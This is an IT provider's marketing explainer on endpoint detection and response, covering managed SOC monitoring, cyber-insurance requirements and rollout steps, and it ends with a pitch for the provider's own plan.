The short version
EDR — endpoint detection and response — is the security category that replaced "antivirus" for businesses. Antivirus matched files against a signature list of known-bad malware. EDR watches what programs do on the endpoint — processes, files, network calls, registry edits, command-line behavior — and detects the patterns that real attacks use, even when the attacker is using legitimate built-in Windows or macOS tools (called living-off-the-land).
On top of detection, EDR provides response: it can isolate a compromised device from the network, kill a malicious process, quarantine a file, and (in many products) roll back ransomware changes. Modern managed EDR is paired with a 24/7 Security Operations Center (SOC) — humans who triage the alerts so the business owner isn't getting paged at 9 PM about a false positive.
Why antivirus stopped being enough
Three things changed:
- Attackers stopped using detectable malware. Modern ransomware groups frequently get in through phishing, then use the built-in tools (PowerShell, PsExec, WMI, RDP) to move around. Nothing for signature antivirus to flag.
- Attackers got faster. The average time from initial compromise to ransomware encryption is now measured in hours, not days. Signature antivirus relies on a vendor seeing a sample, writing a signature, and pushing it. Too slow for a sub-day attack.
- Attackers got patient when patience pays. Some groups dwell for weeks before encryption, exfiltrating data and mapping the network. Behavioral detection catches the dwell; signature antivirus does not.
What EDR detects that antivirus doesn't
- Living-off-the-land — PowerShell scripts pulling code from remote URLs, PsExec running on a non-IT machine, wmic.exe spawning processes on remote hosts.
- Credential theft — Mimikatz-class behavior, LSASS memory reads, Kerberos ticket abuse.
- Lateral movement — unusual RDP sessions, SMB write patterns, scheduled-task creation on remote machines.
- Ransomware staging — mass file enumeration, shadow-copy deletion, backup-service termination.
- Persistence — unusual registry Run keys, scheduled tasks, services, WMI subscriptions.
Each of these patterns is normal in a single isolated case (admins use PowerShell; backup software deletes shadow copies). What EDR catches is the sequence: PowerShell pulling from a suspicious URL, then enumerating files, then deleting shadow copies, then killing the backup service — on an endpoint that's never done any of that before.
What "response" actually means
Detection alone is observation. Response is action. A managed EDR with SOC can:
- Isolate the endpoint — cut its network access, leaving only the EDR's secure channel. The attack stops moving while the rest of the business keeps running.
- Kill the malicious process — before encryption completes, before exfiltration completes.
- Quarantine the file — pull the dropper off disk and into a forensic store.
- Roll back ransomware changes — some EDR products keep volume-shadow-style change logs and can restore files encrypted in the last hour.
- Provide the forensic record — cyber-insurance carriers and incident-response firms need the timeline. EDR keeps it.
Why 24/7 SOC matters
An EDR alert on its own is a notification, not a decision. Is this PowerShell script a legitimate admin task or a phishing payload? Is this RDP session the office manager logging in from her home laptop or a hands-on-keyboard attacker who stole her credentials?
A SOC answers those questions inside the same shift — usually within minutes — and takes the response action while the business owner is still on a call with a client. Without a SOC, the EDR sends emails to a distribution list that nobody reads at 10 PM, and the response window closes.
The combination — EDR plus 24/7 SOC — is what cyber-insurance carriers now ask about on the renewal application. "Do you have EDR?" is the question. "Do you have EDR with managed SOC monitoring?" is the better question.
What cyber insurance asks for
Carriers in 2026 typically require:
- EDR (not antivirus) on every endpoint — workstations, laptops, servers.
- 24/7 monitoring of EDR alerts (managed SOC or internal SOC, not "we'll check it Monday").
- Average time-to-isolate under a defined SLA (usually 15–30 minutes from alert).
- Forensic retention — enough log data to reconstruct an incident.
See cyber insurance is requiring MFA and EDR — what that means for the full eleven-control list.
What an EDR rollout actually involves
For a small business moving off legacy antivirus to a managed EDR:
- Asset inventory — every workstation, laptop, server we want covered.
- Agent deployment — the EDR sensor installs in minutes per endpoint, no reboot required for most platforms.
- Policy baseline — the SOC tunes detection for the business's normal patterns (so the law firm's late-night PowerShell from one specific user isn't a 2 AM alert every night).
- Decommission the old antivirus — in a controlled order, so there's never a gap.
- Documented response runbook — who the SOC calls when, in what order, with what authority.
For a 25-person office, the rollout typically completes in 2–3 weeks of background work; the user experience is no change.
How a Micro-IT plan covers EDR
Every Micro-IT client environment ships with EDR on every endpoint as part of Managed Endpoint, paired with a 24/7 SOC monitoring all alerts. The SOC follows a documented incident-response runbook — isolate the endpoint within 90 seconds of detection, call the client within 15 minutes, restore from clean backups if needed. We have never paid a ransom, and we never will. See the Security page for the full eleven-vendor, seven-layer stack, or get a written quote with EDR included on every device.